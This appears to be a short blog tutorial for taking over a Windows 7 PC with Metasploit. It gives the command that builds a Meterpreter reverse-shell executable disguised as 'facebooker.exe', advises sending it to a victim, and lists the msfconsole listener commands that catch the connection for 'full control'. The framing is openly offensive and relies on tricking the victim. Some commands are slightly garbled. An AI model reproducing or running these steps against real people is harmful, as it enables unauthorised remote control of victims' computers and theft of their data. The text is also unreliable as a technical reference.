How to hack window with Metasploit –
today i will teach u how to hack PC with metasploit.
In this tutorial, window 7 is my victim’s PC
and backtrack is attacker’s Machine.
so let’s start…
Open backtrack. and type “cd /opt/framework/msf3?
then set payload..
for set payload
command: “msfpayload windows/meterpreter/reverse_tcp LHOST=yourIP
LPORT=1337 X > facebooker.exe”
now your payload is ready…
send it to your victim….
but first you have to set listener..
To do this start msfconsole.
and give command
————————————-
“use multi/exploit/handler”
————————————–
“set PAYLOAD windows/meterpreter/reverse_tcp”
————————————
“set LHOST yourIP”
—————————————-
“set LPORT 1337?
———————————–
“exploit”
——————–
ANd wait for victim’s click…
whenever victim click your PAYLOAD..you will get full control over
victim’s PC..
Here is the video tutorial…
https://www.youtube.com/watch?v=AbbOfdJ8M2I
No comments:
Post a Comment